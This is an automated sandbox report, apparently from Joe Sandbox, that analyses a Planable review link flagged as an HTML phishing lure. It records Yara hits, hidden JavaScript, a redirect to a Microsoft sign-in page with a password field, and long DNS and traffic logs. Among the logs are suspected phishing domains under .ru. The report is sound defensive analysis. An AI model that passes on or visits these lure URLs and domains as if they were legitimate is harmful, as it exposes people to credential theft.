Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://app.planable.io/review/0OPaw36t6M_k

Overview

General Information

Sample URL:https://app.planable.io/review/0OPaw36t6M_k
Analysis ID:1587475

Detection

HTMLPhisher
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish29
AI detected landing page (webpage, office document or email)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1904,i,6481929983807619735,17660691006616261222,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6340 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.planable.io/review/0OPaw36t6M_k" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.12.pages.csvJoeSecurity_HtmlPhish_29Yara detected HtmlPhish_29Joe Security
    1.9.pages.csvJoeSecurity_HtmlPhish_29Yara detected HtmlPhish_29Joe Security
      1.13.pages.csvJoeSecurity_HtmlPhish_29Yara detected HtmlPhish_29Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 1.12.pages.csv, type: HTML
        Source: Yara matchFile source: 1.9.pages.csv, type: HTML
        Source: Yara matchFile source: 1.13.pages.csv, type: HTML
        Source: https://app.planable.io/review/0OPaw36t6M_kJoe Sandbox AI: Page contains button: 'VIEW PDF ONLINE' Source: '1.9.pages.csv'
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Number of links: 0
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Base64 decoded: 97184bdd-3566-413e-ad69-89ace973d67569327e90-5322-4e95-93c7-1dbc5d212da9
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Redirecting does not match URL
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: <input type="password" .../> found
        Source: https://app.planable.io/review/0OPaw36t6M_kHTTP Parser: No favicon
        Source: https://app.planable.io/review/0OPaw36t6M_kHTTP Parser: No favicon
        Source: https://app.planable.io/review/0OPaw36t6M_kHTTP Parser: No favicon
        Source: https://app.planable.io/review/0OPaw36t6M_kHTTP Parser: No favicon
        Source: https://6nlp.ueralawarism.ru/oqBP/HTTP Parser: No favicon
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No favicon
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="author".. found
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
        Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638721050692742532.OTcxODRiZGQtMzU2Ni00MTNlLWFkNjktODlhY2U5NzNkNjc1NjkzMjdlOTAtNTMyMi00ZTk1LTkzYzctMWRiYzVkMjEyZGE5&ui_locales=en-US&mkt=en-US&client-request-id=299599de-c184-46d5-930e-be2c523b322d&state=O1o2q82cQuiQtSTRT2Lm35p08FvAP-fHVssuhRFiX7nC3kpTK63-TC6bi3bqTiPtiBTR-Qt9rJWGCLvi7JVvdF1Woaal4aKddlr-8riIVIhW0u10H-kkBAikCKkKQWim7eD6tJSkWnbcrbfm_qySYjWZHY8p3zHg0Wi_7tStHzZR_slKpV22OtTjkjkWY3bgzlsyE_CpAH_sTG-fLSYYHk8DARhAFsFSOyotzh8D0lVmu8i77Sg6g0kNy7QNi2S5wmNmkriv6KBYcHvwZ0V78g&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:50063 version: TLS 1.2
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: global trafficDNS traffic detected: DNS query: app.planable.io
        Source: global trafficDNS traffic detected: DNS query: do9efv5u6nwa8.cloudfront.net
        Source: global trafficDNS traffic detected: DNS query: apis.google.com
        Source: global trafficDNS traffic detected: DNS query: cdn.headwayapp.co
        Source: global trafficDNS traffic detected: DNS query: d2dzu5rf27gdz3.cloudfront.net
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: sentry.io
        Source: global trafficDNS traffic detected: DNS query: sdk.split.io
        Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
        Source: global trafficDNS traffic detected: DNS query: segment.planable.io
        Source: global trafficDNS traffic detected: DNS query: www.planable.io
        Source: global trafficDNS traffic detected: DNS query: auth.split.io
        Source: global trafficDNS traffic detected: DNS query: inner.planable.io
        Source: global trafficDNS traffic detected: DNS query: rum-static.pingdom.net
        Source: global trafficDNS traffic detected: DNS query: cdn.firstpromoter.com
        Source: global trafficDNS traffic detected: DNS query: widget.intercom.io
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdn.logrocket.com
        Source: global trafficDNS traffic detected: DNS query: innertrends.s3.amazonaws.com
        Source: global trafficDNS traffic detected: DNS query: www.facebook.com
        Source: global trafficDNS traffic detected: DNS query: js.intercomcdn.com
        Source: global trafficDNS traffic detected: DNS query: babel.innertrends.com
        Source: global trafficDNS traffic detected: DNS query: api-iam.intercom.io
        Source: global trafficDNS traffic detected: DNS query: nexus-websocket-a.intercom.io
        Source: global trafficDNS traffic detected: DNS query: engine-us.montiapm.com
        Source: global trafficDNS traffic detected: DNS query: analytics.tiktok.com
        Source: global trafficDNS traffic detected: DNS query: js.stripe.com
        Source: global trafficDNS traffic detected: DNS query: cdn.mxpnl.com
        Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
        Source: global trafficDNS traffic detected: DNS query: app.satismeter.com
        Source: global trafficDNS traffic detected: DNS query: r.logrocket.io
        Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: api.stripe.com
        Source: global trafficDNS traffic detected: DNS query: cdn.onesignal.com
        Source: global trafficDNS traffic detected: DNS query: status.planable.io
        Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
        Source: global trafficDNS traffic detected: DNS query: api.instatus.com
        Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
        Source: global trafficDNS traffic detected: DNS query: analytics.google.com
        Source: global trafficDNS traffic detected: DNS query: onesignal.com
        Source: global trafficDNS traffic detected: DNS query: api.segment.io
        Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
        Source: global trafficDNS traffic detected: DNS query: logs.mezmo.com
        Source: global trafficDNS traffic detected: DNS query: rum-collector-2.pingdom.net
        Source: global trafficDNS traffic detected: DNS query: api-js.mixpanel.com
        Source: global trafficDNS traffic detected: DNS query: r.stripe.com
        Source: global trafficDNS traffic detected: DNS query: m.stripe.network
        Source: global trafficDNS traffic detected: DNS query: m.stripe.com
        Source: global trafficDNS traffic detected: DNS query: stripe.com
        Source: global trafficDNS traffic detected: DNS query: attribution.planable.io
        Source: global trafficDNS traffic detected: DNS query: 6nlp.ueralawarism.ru
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: fmvrvcbehzfgiwxdoam0usw9nl2bnpllzwu0umzhubb4cizjgwfoc.deryposi.ru
        Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
        Source: global trafficDNS traffic detected: DNS query: www.office.com
        Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
        Source: global trafficDNS traffic detected: DNS query: streaming.split.io
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
        Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
